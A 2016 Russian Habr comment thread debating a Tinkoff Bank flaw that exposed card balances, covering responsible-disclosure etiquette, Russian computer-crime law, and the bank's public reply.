Дорогой OP, благодарю тебя за то, что не продал уязвимость. Твой альтруизм глуп, но общество гордится тобою.
ChALkeRx
12.08.2016 11:17Бестолковость надо наказывать.
Почему? Вы думаете, это в целом сделает лучше?
Второй момент — альтуризм не глуп, это ошибочное мнение.
Wedmer
11.08.2016 22:08-2У меня 500к рублей на карточке показывает, не ожидал, что столько может на ней быть)
pansa
11.08.2016 22:13+4Друзья, будьте осторожны с опытами. ИБ банков не всегда адекватны, а подобные действия, увы, очень легко квалифицировать по УК.
ChALkeRx
11.08.2016 22:28+2Вы же локально тестировали, а не на волшебный сайт номер своей карты ввели, да? Успокойте меня.
Wedmer
11.08.2016 22:42Рандомный набор цифр))
Wedmer
11.08.2016 22:48+1Сгенерировал еще одну, там ноль кажет( А номер той не запомнил(((
ChALkeRx
12.08.2016 09:40Я так подозреваю, что по логике работы скрипта вам будет выдаваться 0 на все неверные номера карт.
Он же пытается найти минимальную сумму, попытка перевода которой не вызовет ошибку, а для неверных номеров карт — все вызовут.
ChALkeRx
11.08.2016 22:26+24Тут в этой истории неадекваты все.
- Банк сделал откровенную фигню.
- Те, кто написал на это ТЗ, потом принял.
- Программисты, которые это сделали и не написали что получается бардак.
- Внутренний аудит безопасности либо отсутствует, либо зря хлеб ест. Либо процесс интеграции сломан.
- Банк не отвечает не репорты уязвимостей.
- Вы, судя по всему, не предприняли достаточных шагов при оповещении банка об уязвимости.
- Вы выложили скрипт, который принимает номера карт других людей и вообще-то непонятно что с ними делает. При этом он непонятно где хостится.
- Данные в ваш скрипт передаются по незашифрованному каналу.
- Наверняка нашлась парочка-другая волшебных людей, которые реально ввели туда номера своих карт.
Номера карт — не настолько ценные сами по себе, но всё же, блин, так делать нельзя.
boblenin
11.08.2016 23:00+4Банк сделал откровенную фигню.
Те, кто написал на это ТЗ, потом принял.
Уникальный случай в разработке ПО? В чем неадекватность?
Программисты, которые это сделали и не написали что получается бардак.
Обычно программисты всегда прекрасно понимают последствия всех изменений и безусловно высказывают свое мнение, к которому прислушивается руководство. Или все-таки больше похоже на обычный сценарий. Большенству по-барабану, а те кому нет или постеснялись сказать или их не слушают. В чем неадекватность?
Внутренний аудит безопасности либо отсутствует, либо зря хлеб ест. Либо процесс интеграции сломан.
Аудит безопасности — это банк. Не высший уровень защиты, т.к. нет угрозы здоровью или жизни. Аудит квартальный в лучшем случае. Чаще делать — будет слишком дорого. Вот bug bounty программа — пожалуй дешевле вариант.
Банк не отвечает не репорты уязвимостей.
Не известно на какой им Email отправили. Может быть это ушло в support а может в sales. В первом случае есть шанс что доберутся через недельку, а во втором — точно сразу в spam. Тут не неадекватность, а недостаток информации у меня. На счет вас не знаю.
Вы, судя по всему, не предприняли достаточных шагов при оповещении банка об уязвимости.
А вы бы какие шаги предприняли на месте автора статьи? Я могу представить себе причины почему автор мог написать такую статью. Поступок будет в зависимости от сценария от логичного до логичного, но не обдуманного. Но неадекватность не видно.
Наверняка нашлась парочка-другая волшебных людей, которые реально ввели туда номера своих карт.
Вот с неадекватностью таких людей я соглашусь. Все-таки это читатели habr, а не космополитен.
ChALkeRx
11.08.2016 23:20+6Уникальный случай в разработке ПО? В чем неадекватность?
Нет, не уникальный. Но это его не оправдывает.
Обычно программисты всегда прекрасно понимают последствия всех изменений и безусловно высказывают свое мнение, к которому прислушивается руководство. Или все-таки больше похоже на обычный сценарий. Большенству по-барабану, а те кому нет или постеснялись сказать или их не слушают. В чем неадекватность?
Нормальные люди, когда реализуют такую штуку, понимают логику её работы. На уровне ТЗ детали могут быть ясны не всегда, но на уровне реализации все пробелы заполняются. В данном случае, достаточно легко можно увидеть наличие проблемы — об этом должно было быть сообщено. Для этого кода вообще не должно было быть создано предложение смерждить его в мастер, ровно как он не должен был ревью пройти. Задача должна была быть отправлена назад за уточнениями.
Если им, после возникновения таких замечаний и их детального описания, сверху подтвердили, что ровно так всё и должно работать — претензии к программистам снимаются, но это мне кажется довольно маловероятным.
Аудит безопасности — это банк. Не высший уровень защиты, т.к. нет угрозы здоровью или жизни. Аудит квартальный в лучшем случае. Чаще делать — будет слишком дорого. Вот bug bounty программа — пожалуй дешевле вариант.
Не аудит, а ревью функциональных изменений. Для этого достаточно держать одного адекватного человека в штате. Или двух. Мне почему-то кажется, что Tinkoff может себе это позволить.
Не известно на какой им Email отправили. Может быть это ушло в support а может в sales. В первом случае есть шанс что доберутся через недельку, а во втором — точно сразу в spam. Тут не неадекватность, а недостаток информации у меня. На счет вас не знаю.
Соглашусь. Я предполагал, что автор всё-таки написал нормальное письмо куда надо, если это не так — претензии к реакции на сообщение со стороны банка, безусловно, снимаются.
А вы бы какие шаги предприняли на месте автора статьи?
Я ответил чуть выше: https://habrahabr.ru/post/307628/#comment_9747502
- Банк сделал откровенную фигню.
tema_sun
11.08.2016 22:32+1Я написал в поддержку, как их клиент. Саппорт ответил, что передал информацию коллегам и в течение суток мне ответят.
Вы очень поспешили с публикацией.DenimTornado
11.08.2016 23:08+1блин, а вот скажите, неужели нельзя позвонить? Вот проще всего же понять, есть фидбек или нет именно позвонив. Меня так радует когда кулхацкеры говорят: «Я там на какой-то адрес отправил, хз. Вот вам дыра..»
ChALkeRx
11.08.2016 23:23+3Если уже публичная, можно, если нет — не стоит сообщать саппорту детали проблемы. Единственное, чего стоит добиваться от саппорта — это либо контактов безопасников, либо (если контакты есть и молчат) — ответа на то, получили ли они сообщение и что там с ним.
KovVlad
12.08.2016 10:53kromm, пишу от имени Банка Тинькофф
вы не возражаете, если я опубликую текст вашего письма?kromm
12.08.2016 13:03+3Публикуйте конечно, если хотите, тем более вон люди интересуются.
И все же интересно — письмо только сейчас подняли или его получили и оно сразу молча пошло в неспешную обработку?
pansa
11.08.2016 23:26+1Автор совершил сразу несколько крупных ошибок.
1) Выполнял пентестинг, о котором его никто не просил. Формально — это прямое нарушение закона, увы.
2) Понятно, что не всё всегда по закону, и немножко пощупать всегда можно. Но, если уже занялся этим и тем более — обнаружил что-то — сделай всё возможное, чтобы доснести инфу до нужных людей.
3) Не получилось донести — забей и забудь. Расскажи друзьям за кружкой пива. Если уже очень чешется — опубликуй анонимно. Это же не pornhub.com какой-нибудь, и, повторюсь, вас никто не просил искать дыры.
Это всё imho. Я абсолютно уверен, что автор не имел злого умылса, и даже вполне понимаю его порыв. Но деньги с карты Т. я бы посоветывал пока снять. И теперь продумать возможные дальнейшие ходы обеих сторон.
DenimTornado
11.08.2016 23:31+1Это, я дико извиняюсь, а что не так с pornhub? У них, кстати, отличная программа Bug Bounty…
pansa
11.08.2016 23:38+3А всё отлично, они большие молодцы. Достойно заплатили за, в том числе не их, баги (я про php). А уж сколько часов смеха и позитива принесла новость о запуске ими тестирования на проникновение — это ж и не подсчитать! :D
PH я привел к тому, что за его неофициальный пентестинг (blackhat-ом) и дисклоза дыр автору на 99.9% ничего не будет. Ну максимум закроют аккаунт на ph, если оные существуют. А тут банк, РФ, очевидная работа без какой-либо анонимизации, да еще и публичный дисклоз через 3 дня. Очень надеюсь на адекватность Т, но, господа, так дела не делаются.
ChALkeRx
11.08.2016 23:34+1Но, если уже занялся этим и тем более — обнаружил что-то — сделай всё возможное, чтобы доснести инфу до нужных людей.
Вот. Это верно, так и нужно делать. Это основная его ошибка.
Кстати, вы забыли, что его ещё укусить могут за сбор номеров карт на своём сайте. А что он их реально не собирал — ему потом, возможно, придётся людям в форме доказывать. Не стоило такую форму вообще публиковать, не с полным номером карты.
pansa
11.08.2016 23:51+1Нашим людям в форме далеко плевать на такую ерунду. Ну так, примерно до тех пор, пока их самих это не коснется. Шифровальщики, винлоки, смс-подписки, и другие варианты ни капли не честного отъема денег у населения — процветали, а некоторые процветают до сих пор. При этом есть информация по которой можно ниточку распутать, есть помощь в лице, как минимум, антивирусных компаний. Но им не надо. Вот дети бумагу жгут/во вконтакте репостят «бога нет» (еще про бедных ловцов покемонов забыл!..) — это вот да, вот это они ловить готовы, видимо.
Или вот по наводке безопасников банка могут начать серьезно копать. Понятно, исключительно из чистоплотных побуждений.ChALkeRx
12.08.2016 00:08Или вот по наводке безопасников банка могут начать серьезно копать.
Ну вот этого и стоит опасаться в данном случае.
pyrk2142
12.08.2016 00:31По первому пункту у меня давно возник вопрос: если исследователь проводит пентест и получает доступ только к своим данным без нарушения работы сервиса, то является ли это незаконным? Если да, то какой закон это регулирует?
Temirkhan
12.08.2016 13:22Все написанное ниже — имхо.
Есть закон и есть справедливость. Если проводить аналогию, то шарить в чужом доме в поисках собственной вещи, которая там есть и о чем вы прекрасно знаете, по логике закона нельзя. Иными словами, закон разграничивает права там, где начинаются права других лиц. И, нет, нельзя самовольно устраивать проверки того, «насколько хорошо» хранится ваше имущество у третьего лица.pyrk2142
12.08.2016 14:41Сложный вопрос, на самом деле. С одной стороны, ваши слова весьма логичны и имеют смысл. С другой стороны, по-моему, нарушения справедливости недостаточно для наказания за это. Нужно нарушить какой-то закон.
Temirkhan
12.08.2016 17:33Я к этому и писал: закон и справедливость далеко не всегда идут по одному пути
xenon
12.08.2016 00:31+6Как юридически — я не знаю, не юрист.
А вот с этической точки зрения, мне кажется, неправильно рассматривать ситуацию в виде «двугольника» автор+банк. Есть еще третья сторона — клиенты банка. Так вот у клиентов банка есть интерес в том, чтобы:
1) Банк (и их счет в нем) был защищен
2) Если же 1) не соблюдается, что чтобы велись работы над закрытием дырок и было движение к достижению п.1
3) Если ни 1, ни 2 (дырки есть, но не чешутся) — то хотя бы, чтобы клиенты банка были в курсе, и могли принять решение о своем поведении.
Причем, я даже не уверен, что интересы банка тут имеют какую-то важность. Они важны только как следствие интересов клиентов. Нельзя публиковать информацию об уязвимости слишком быстро, но не потому что в банке кому-то дадут нагоняй, а потому что клиентам лучше, чтобы банк «тихо» закрыл дырку, до ее опубликования.
lexore
12.08.2016 01:43+31) Выполнял пентестинг, о котором его никто не просил. Формально — это прямое нарушение закона, увы.
В том, чтобы дергать открытое api, нет ничего противозаконного в РФ.
KivApple
12.08.2016 05:31Вопрос в том насколько оно открытое. Я сомневаюсь, что данный API имеет официальную публичную документацию. С тем же успехом можно попытаться декомпилировать мобильное приложение Сбербанка и опубликовать API для работы с карточками (при этом, если там всё грамотно устроено, в принципе это даже будет безопасно для клиентов, потому что для проведения операций нужно сначала доказать, что ты владелец карты). Я в этом не вижу ничего плохого, если только там нет дыры и расковырявший приложение не обчистит чужие карточки (однако в данной ситуации будет виноват не только хакер, но и банк, сделавший кривое API), однако с точки зрения законодательства это будет классифицироваться совершенно иначе. То что в случае из статьи не нужно заморачиваться с декомпиляций, а достаточно открыть «инструменты для разработчика» браузера ничего не меняет (аналогия с незапертой квартирой — туда всё равно нельзя входить без спроса).
lexore
12.08.2016 12:15+1однако с точки зрения законодательства это будет классифицироваться совершенно иначе
Мне кажется, мы дискутируем на уровне домыслов. Давайте поднимем законодательство. Я знаю следующие статьи УК РФ:
- Статья 272 УК РФ (Неправомерный доступ к компьютерной информации), устанавливает ответственность за "неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети".
Неправомерного доступа нет — есть страничка на общедоступном сайте, куда можно свободно вводить номер карты и получать ответ "не хватает денег". Вот если бы там стоял хоть какой-то пароль (даже "111") и автор его подобрал, был бы другой разговор.
- Статья 274 УК РФ (Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети) предусматривает ответственность за "нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред". Понятие "существенности" вреда является оценочным и в каждом конкретном случае определяется индивидуально.
Уничтожения, блокирования или модификации информации на серверах тинькова не происходит.
- Статья 146 УК РФ (Нарушение авторских и смежных прав)
Ну это так, до кучи. Тоже мимо — авторские права на произведение не нарушены.
Так что ничего противоправного не делается.
P.S.
Аналогия с незапертой квартирой все-таки не подходит. Квартира — пассивный объект. А веб сервис — активный. Каждый раз он отвечает на запрос. Веб сервис мог бы проверить права перед выдачей ответа. Поэтому более правильной аналогией будет хозяин квартиры, который реагирует на запросы с улицы "а скинь мне телек". Никто же не запрещает хозяину квартиры дать кому-то что-то из квартиры, верно? :)deustech
12.08.2016 13:26По 274 УК РФ вот как раз модификация информации на серверах Тинькова происходит — пишутся логи(!), как это не странно, но для суда этого аргумента в недавних делах было достаточно.
lexore
12.08.2016 13:28Был бы рад ссылке на такое дело. А вообще логи пишет сам веб сервер, хакер их не трогает)
deustech
12.08.2016 13:45Пивоваров и база МВД.
msuhanov
12.08.2016 20:25Ага, сторона защиты утверждает, что состава преступления по статье 272 УК РФ нет, потому что не было модификации охраняемой законом компьютерной информации:
Как утверждает защита Пивоварова, все они показали, что базы данных МВД не были каким-либо образом модифицированы, и, следовательно, статья 272 использована быть не могла
(источник)
Но вменяют ведь копирование:
Судья Игорь Загаров решил иначе, согласившись с доводами прокурора о том, что простая пометка о верности или неверности, сделанная в подписных листах, уже свидетельствовала о копировании данных
(там же)
А в статье 272 УК РФ написано так: «если это деяние повлекло… модификацию либо копирование». Копирование было? Было. Хотя бы на компьютер-клиент для отображения. Или, как решил судья, на бумагу, но не в исходной, а в производной форме.
khanid
12.08.2016 16:40Хм, интересное предложение, пробиваться через ряды техподдержки для того, чтобы им же и помочь.
Это не самое благодарное занятие, даже если вы немаленькое юр.лицо.
А смысл вывешивать адрес, если его не используют?
Так что автором, с моей точки зрения, всё было сделано вполне корректно.
avost
13.08.2016 06:50+1>а вот скажите, неужели нельзя позвонить?
Я бы не стал. И письмо бы посылал через семь анонимайзеров. Много лет назад один знакомый имел неосторожность высказаться насчёт теоретической слабости одной платёжной системы (по-моему, это была золотая корона). Банк заслал маски-шоу — приехали из другого города, свинтили в наручниках с работы, увезли в этот другой город. Родственники чуть с ума не сошли — человек пропал. Еле нашли. Потом очень много времени вызволяли из каталажки, где человек очень сильно подорвал здоровье. И это ещё повезло, они хоть купили, но всё же всего лишь продажных ментов, а не совсем уж бандитов. Тогда и за меньшее закапывали в лесочке.
Сейчас, с одной стороны, времена уже немного не те, а с другой, вон, какой-то деятель, пишущий «от имени банка» всё же предпринял на редкость неуклюжую попытку демонизировать топикстартера… ;(
Не, я бы не стал бы на месте автора деанонимизироваться. И с буржуйскими банками часто та же беда — сколько случаев, когда подают иск против того, кто им на дыры указывает.
avost
13.08.2016 07:04>а вот скажите, неужели нельзя позвонить?
Ну, собственно, они ещё и угрожать пытались…
https://habrahabr.ru/post/307628/#comment_9748286
Не, какие звонки? Даже и не думайте…Optik
13.08.2016 07:17В какой фразе? Че то не увидел %)
avost
13.08.2016 08:10Пытаются объявить методы топикстартера незакоными. И пр какие-то номера карт…
ChALkeRx
13.08.2016 09:37Про номера — в изначальной версии статьи тут была ссылка на сайт, где был выложен и работал пхп-скрипт топикстартера.
Там предлагалось ввести полный номер (своей?) карты и проверить, работает ли определение суммы на ней.
Причём вся передача данных шла по незашифрованному http.
Optik
13.08.2016 10:48Это не обвинения, а требования общие для всех по законодательству и условиям процессинговых сервисов. На то, что сделан специальный скрипт и выложен в паблик (по сути способ эксплуатации уязвимости) автору указывали здесь многие. Имхо, это косяк именно автора.
Обвинениями это было бы, если б банк написал заявление (формально это возможно в данной ситуации) или еще каким либо образом давил на автора. Ничего такого здесь нет. Идет дискуссия автора, клиентов, неклиентов, банка (и всякий левый флуд как обычно во взрослом техническом сообществе =) )avost
13.08.2016 13:58+1Это не обвинение, это неумная попытка запугивания и детское, — «а ты! А ты! А ты! Сам дурак!»
Ничего незаконного в скрипте нет. Он делает _ровно_ то же самое, что скрипт со страницы банка. Тогда и банковский скрипт незаконен? Смешно и нелепо.ChALkeRx
13.08.2016 14:20+1Он делает ровно то же самое, что скрипт со страницы банка.
Нет. Этот скрипт был запущен на стороннем сайте (предположительно, автора) и автор предлагал вводить туда свои номера карт, которые передавались ему на сервер, причём по незашифрованному каналу. Плохо именно это, а не сам факт написания и выкладывания кода скрипта.
Но автор уже это исправил и ссылку на сайт с формой ввода своего номера карты убрал, правда, не сразу.
avost
13.08.2016 17:21+1Каждый может написать скрипт с формой ввода номера карты ;) что в этом незаконного? Страница не фишинговая, подмены нет, ничего незаконного не обещается, равно как и каких-то золотых гор. Ну, а вводить туда номер своей карты или не вводить — тут всяк сам себе хозяин. :)
tema_sun
12.08.2016 16:07UPD
Только что пришел ответ, что все починили. Не знаю куда писал автор, но Тинькофф быстро работает.
taulatin_one
11.08.2016 23:37-19Очередной «школьник» открыл нам Америку?!
И тут же начинается массовое обсасывание несущественной по сути особенности работы сервиса.
Ну и по традиции всех кармафилов, как же без этого, желтый заголовок, для привлечения заблудших мотыльков, которым нужно что-нибудь погорячее для разбавления их офисной скуки.
pansa
11.08.2016 23:59+9«У вас брат в Москве есть?» ©
taulatin_one
12.08.2016 23:38-6Для вас лично и для остальных «дотошных идиотов», коих на хабре множество, а особливо для тех кто бездумно ставит плюсики и минусики, сообщаю:
Вы некорректно использовали знак "©". В этом виде он скорее выглядит как элемент оформления. Советую сначала изучать вопрос, и только потом показывать оригинальность мысли. А то можно «напороть косяков», которые, в ином приличном обществе, поняты не будут.
А лично вы, коллега, идите и работайте над улучшением своего антивируса (вы же из лавки под названием DrWEB?), а то он распознает мою коммерческую программу как вирус, а там всего-то используется пара механизмов для обфускации и шифрования контента в целях защиты от взлома. (Заявку по поводу ложного срабатывания отправил, однако ума не приложу, как так можно определять вредоносные программы. Случаем вы там не нанотехнологичное устройство для рандомизации используете в качестве основного ядра?)pansa
13.08.2016 00:09+4> А то можно «напороть косяков», которые, в ином приличном обществе, поняты не будут.
Не обижайтесь на «дотошных идиотов». Ни в мыслях не было унижать знак (с), использовав его, как элемент оформления!
> вы же из лавки
Вы правы! Коллега. :)
> Случаем вы там не нанотехнологичное устройство для рандомизации используете в качестве основного ядра?
Мы там, случаем, именно его.
Здоровья и успехов, коллега! И хороших выходных. Отдохните. Вам надо.
Asen
12.08.2016 00:05+1Запросы из топика явно ведут в открытый API интерфейс банка. Если есть динамическая проверка баланса, наверняка и еще что-то есть. По-хорошему бы этот интерфейс тоже следует проаяксить, как следует… кому не лень, конечно же
JiLiZART
12.08.2016 01:11-4А всего то надо добавить некий CSRF токен, уникальный для каждой сессии, передаваемый в заголовке к запросу, ну и проверять его.
pyrk2142
12.08.2016 01:53+2Зачем? В данном случае это не поможет, так как тут можно посмотреть данные по чужой карте, а не подделать запрос от имени пользователя.
Mad__Max
12.08.2016 03:11+1Ну и на правах побрюзжать. Последний интернет-банк получился абсолютно неюзабельным, грустно читать тут статьи разработчиков, которые им еще и гордятся. Переборщили так, что даже заходить лишний раз не хочется, грузится подольше некоторых игрушек, хорошо, хоть мобильное приложение пока нормальное.
К счастью обе предыдущие версии интернет банка все еще доступны и работают с сохранением всех функций. Новые в них конечно не добавляют, но все что было изначально — поддерживается в рабочем состоянии.IgorPastukhov
12.08.2016 03:25+1А там есть новые функции? Я слышал только об одной — не показывать спецпредложения. Сам пользуюсь исключительно старым.
petuhov_k
12.08.2016 05:56Искренне не понимаю, зачем они постоянно переписывают интернет банк. Ведь никакой существенной пользы. При этом мобильный клиент под WindowsPhone так и не обзавёлся необходимым функционал — в отзывах уже несколько лет просят добавить накопительные счета. Недавно неожиданно кончились деньги на карте — на пополнение через мобильный портал минут 15 потратил. Как можно написать такой тормозной сайт, не представляю. И ведь, в блоге своём, они про это не расскажут.
deinlandel
12.08.2016 11:05А как туда попасть, не подскажете? Раньше ссылка на старый банк вверху была, сейчас её нет, а URL я не сохранил.
gorl
12.08.2016 04:11+3Добавьте еще в пост отправленное в банк письмо.
ChALkeRx
12.08.2016 09:23+2Кстати, да. Раз уж это всё равно публичное — хотелось бы увидеть, что именно и куда именно было отправлено.
Кроме письма ещё таймлайн тоже было бы неплохо по датам увидеть — найдено/сообщено/опубликовано, как это обычно делают.
tractus_lepus
12.08.2016 08:14Ну и на правах побрюзжать. Последний интернет-банк получился абсолютно неюзабельным, грустно читать тут статьи разработчиков, которые им еще и гордятся.
Это не проблема, можно пользоваться старым интернет-банком по адресу my.tinkoff.ru
ekubyshin
12.08.2016 09:20+2Тем временем в инстаграмме Олега Тинькова
https://www.instagram.com/p/BIxP2MhBcvh/?taken-by=olegtinkovekubyshin
12.08.2016 09:36а что вы хотите то, например, недавно запущенная страничка проекта oplata.tinkoff.ru, на мобиле разваливается. целый отдел фронтендеров, не смогли адаптировать одну страничку под мобилы.
pitsakh
12.08.2016 10:55+5Из разряда: «Извините, Вы не можете использовать указанный пароль. Такой пароль уже использует пользователь Misha. Пожалуйста, придумайте другой пароль.» (с)
kolesov_prod
12.08.2016 10:55Прочитал статью только сейчас, решил проверить на своей карте — не показывает вообще ошибку с недостаточностью средств. Похоже, что дыру прикрыли.
Ipeacocks
12.08.2016 11:20-3Это же банк, там все более костыльно (потому что сделать нормально — жалко денег) чем в других компаниях. Хотя, казалось бы, деньги дело важное…
А приватные данные всех волнуют не более чем на словах…
yamatoko
12.08.2016 11:25ну и в чем уязвимость? допустим, у меня там на счету пару тысяч $ и кто-то это знает, что дальше-то? не говоря о том, что нужно сначала каким-то образом еще узнать номер моей карты.
iqiaqqivik
12.08.2016 11:30Когда у вас на счету будет не воображаемая пара тысяч долларов, а настоящий миллион, вы это поймете сами.
yamatoko
12.08.2016 12:01+1скажу вам по секрету: у любой шишки — человека, занимающего высокое положение — есть примерно такая сумма в банке. вы это знаете. любой это знает. уязвимость? уязвимость. ваши действия?
ploop
12.08.2016 12:06В банке, в активах, в слитках, хоть в борзых щенках, где угодно. Но не на карте. И если вы в десятке Форбс, вы не на столько глупы, чтобы держать все сбережения
под подушкойна одном счёте с привязанной картой.yamatoko
12.08.2016 12:08ну, а вы сказали выше, что миллион на карте кто-то станет хранить.
ploop
12.08.2016 12:11Про миллион говорил не я, но всё же, если вы какая-то бабулька, скопившая с пенсии миллион — дело одно, и храниться он может там довольно безопасно (пока про него никто не знает), а если вы публичный человек с явно нехилыми доходами — дело другое.
avost
13.08.2016 06:56А кто сказал про все? Они такие суммы чисто «на карманные расходы» держат. Конечно же на карте. Другие варианты куда менее удобны.
ploop
12.08.2016 11:35что дальше-то?
Ничего, что это приватная информация? Хорошо, если жена узнает, что вы заныкали от неё на карте пару тысяч $ (отделаетесь скандалом), а если злоумышленник? Потому как целенаправленная атака на конкретного человека в большинстве случаев приведёт к успеху.yamatoko
12.08.2016 11:55ну вот есть злоумышленник, есть человек, у которого пару $ долларов на карте, и злоумышленник это знает. что дальше?
ploop
12.08.2016 12:02Дальше — целенаправленная атака, если сумма того стоит. Выяснение личности, социнженеринг, доступ к телефону (подмена сим), да даже выяснение пин-кода с банальной кражей карты. И не говорите, что это сложно.
yamatoko
12.08.2016 12:17+1то есть, сейчас злоумышленник не сделает это только потому, что он не знает, есть ли у человека $10 тыс на карте? а какого-нибудь начальника чего-то там в фейсбуке за 5 минут, у которого сумма будет покруче с большой вероятностью — это он не догадается? там уже и личность даже выяснять не надо.
Ipeacocks
12.08.2016 12:44Ну есть люди которые вроде живут скромно — а оно и не очень скромно. И наоборот. Узнали что есть приличная сумма на карте — может быть и дома есть что интересное. И вообще зачем шарить такие данные, если можно и не шарить?
yamatoko
12.08.2016 12:57какая цель у злоумышленника? зачем ему выискивать человека, который выглядит скромно и который на самом деле имеет много денег на карте? если можно найти того, кто выглядит не скромно и с большой вероятностью имеет на карте также нескромную сумму. тут даже банк тинькова с их уязвимостью не нужен вообще.
Ipeacocks
12.08.2016 17:47Ну например чтоб украсть карту потом, когда узнал сколько на ней денег. Для начала к-во денег на счету — вполне полезная информация.
Зачем говорить кому-то о том, о чем можно не говорити в конце-то концов?
ploop
12.08.2016 12:54А давайте вы напечатаете у себя на майке на спине «у меня в кошельке 500 рублей» и пойдёте на рынок. А на следующи день — «у меня в кошельке 50к рублей». И так далее.
Может и ничего не случится, но вам приятно будет так ходить? Мне — нет.yamatoko
12.08.2016 13:02я не могу с этого. а давайте вы напечатаете на майке «я дурак». Может и ничего не случится, но вам приятно будет так ходить? Мне — нет.
вы не видели на улицах богатых, хорошо одетых людей? людей на хороших машинах. по ним и так понятно, что у них нехилый баланс на карте. ну и?ploop
12.08.2016 13:13«нехилый» понятие относительное. Выше уже говорили об этом. Да, у них там явно поболе, чем у меня, но даже эти деньги не стоят тюремного срока. А вот упомянутый выше миллион — уже стоит, и ради него можно рискнуть.
Я о том, что когда вы не знаете, сколько у этого хорошо одетого человека денег на карте, рисковать не будете. А если знаете — то дело другое, и не важно, как он одет.
Superl3n1n
12.08.2016 12:03Ок, приведу вам конкретный пример. Огромное предприятие (завод). Всем сотрудникам выдали зарплатную карту нового банка (со старым договор окончен). Соответственно у всех номера пластиковых карт будет идти по порядку (согласно алгоритму Луна), а срок окончания действия карты заканчивается у всех в один месяц. Соответственно остается просто подобрать 3 цифры на обратной стороне карты, а сколько средств там есть, мы уже знаем.
KovVlad
12.08.2016 12:59Соответственно у всех номера пластиковых карт будет идти по порядку
Очень спорное утверждение, поверьте. Вероятность крайне низка.
Соответственно остается просто подобрать 3 цифры на обратной стороне карты
Попыток у вас будет немного. Карта будет заблокирована на анти-фроду.Superl3n1n
12.08.2016 13:08+1Соответственно у всех номера пластиковых карт будет идти по порядку
Очень спорное утверждение, поверьте. Вероятность крайне низка.
Соответственно у всех номера пластиковых карт будут идти по порядку (согласно алгоритму Луна)
Т.е. первые 15 чисел будут идти по порядку, а последняя цифра лишь контрольная сумма. Вы выдернули слова из контекста.KovVlad
12.08.2016 13:18Я тоже про 15 цифр, просто неудачно сократил цитату.
Имел в виду техпроцесс в конкретном нашем банке. Я с ним хорошо знаком по роду деятельностиSuperl3n1n
12.08.2016 13:26Т.е. в Вашем банке, когда заключается договор с предприятием на выдачу зарплатных карт (если таковые договоры у Вас есть), Вы не берете пул чистых айдишников подряд (по сути номера ими и являются), а случайно выбираете из всего имеющегося диапазона?
KovVlad
12.08.2016 13:32не так, и не так
извините, подробнее раскрыть тему не могу, это закрытая информациия
Ipeacocks
12.08.2016 12:42Вы шутите? Зачем кому-то говорить сколько у вас денег? Чтоб пришли и обчистили?
AndrewTishkin
12.08.2016 11:27+1Автор жжёт даже в том, что добавляет в статью UPD3, но не хочет сообщать, что было в UPD2 и UPD1. Какие нафиг вы от него переписки с банком с хронологией хотите добиться? Смиритесь. А то он вообще статью в черновики уберёт
Flagman
12.08.2016 11:32+2Какая разница что он там в письме написал и в какие сроки — важно то, что на сайте банка присутствует столь нелепая «бага», которую они поправили только после поста на Хабре.
AndrewTishkin
12.08.2016 22:12Что значит неважно в какие сроки, Вы что ли зуб даёте, что автор кинулся постить в песочницу не через две минуты после отправки e-mail?
И текст тоже может иметь значение. Если проблема преподнесена чётко, лаконично, с акцентом на том, какие угрозы (разглашение банком посторонним сведений о балансе без разрешения на то клиента, иначе говоря — нарушение банковской тайны) от выявленной баги, то банк уже не имеет шансов отмазаться «ой, мы из первого письма не поняли, о чём речь»Ipeacocks
13.08.2016 23:46-1>> Если проблема преподнесена чётко, лаконично, с акцентом на том, какие угрозы
Тут по-моему и идиоту понятно, что не так. Какие акценты?AndrewTishkin
14.08.2016 10:41Вижу, что уже нашёлся один несогласный.
Да и в комментариях ниже есть человек, который не видит угрозы в том, что кто-то узнает его баланс.
У разгребающего почту сотрудника безопасности может быть шаблонно-конвейерное мышление или просто «коротнуть». Критичная бага — нет, ну и отправим её в конец списка фиксов. А про то, что эта мелочь нарушает закон и потому может спровоцировать шумиху, как-то не подумалось, голова уже следующим письмом занята.
KovVlad
12.08.2016 12:05+1К сожалению, разрешения на публикацию текста письма от уважаемого kromm не дождался, попробуем обойтись без него. Далее — от лица пресс-службы:
Спасибо за то, что помогаете делать наши сервисы ещё более безопасными и удобными. Ошибка незначительная и уже исправлена.
Мы всегда открыты к работе по программе Bug Bounty, но и вы должны использовать законные методы, которые не задевают интересов наших клиентов.
Лучше было бы дождаться ответа от службы безопасности и четче формулировать суть замечаний в письме. Это сократило бы время реакции.
Обратите внимание, что использование автоматизированных методов тестирования без согласования и передача номера карт по незащищенному каналу недопустимы.
Еще раз спасибо за внимательность!
С уважением, Тинькофф
Superl3n1n
12.08.2016 12:11+1Обратите внимание, что использование автоматизированных методов тестирования без согласования и передача номера карт по незащищенному каналу недопустимы.
Можете более детально разжевать данный абзац? Меня конкретно интересует слово «недопустимы».KovVlad
12.08.2016 12:19К примеру, явно запрещены правилами платежных систем.
KovVlad
12.08.2016 12:23-2Это если говорить про передачу номеров.
А насчет несанкционированного пентестинга уже писали выше. Особо добавить нечегоSuperl3n1n
12.08.2016 12:31+1Давайте друг в друга ссылками на комментарии выше кидаться.
KovVlad
12.08.2016 12:41Мне сложно комментировать, я не юрист. Возможно, у наших профильных специалистов мнение отличается от высказанного в комментарии.
Superl3n1n
12.08.2016 12:25Но ведь в данном конкретном случае нигде не требуется соглашаться с правилами, обязательной регистрации с принятием правил данной платежной системы нет. По этому эти правила скорее личные правила внутри платежной системы, не более.
KovVlad
12.08.2016 12:35+1Не совсем. Касательно своей карты: клиент, получая ее, соглашается с правилами использования.
Касательно провокации (мое личное определение, более удачного придумать не могу) ко вводу данных своей карты на HTTP-страничке: при намеренном или случайном разглашении автором собранной информации это уже правонарушение, запрещенное законами РФ.
Ссылка на то, что «это же хабр, тут все подкованные» тут не работает. У хабра хорошая цитируемость в соцсетях, а там публика бывает разнаяSuperl3n1n
12.08.2016 12:41+1Касательно провокации (мое личное определение, более удачного придумать не могу) ко вводу данных своей карты на HTTP-страничке: при намеренном или случайном разглашении автором собранной информации это уже правонарушение, запрещенное законами РФ.
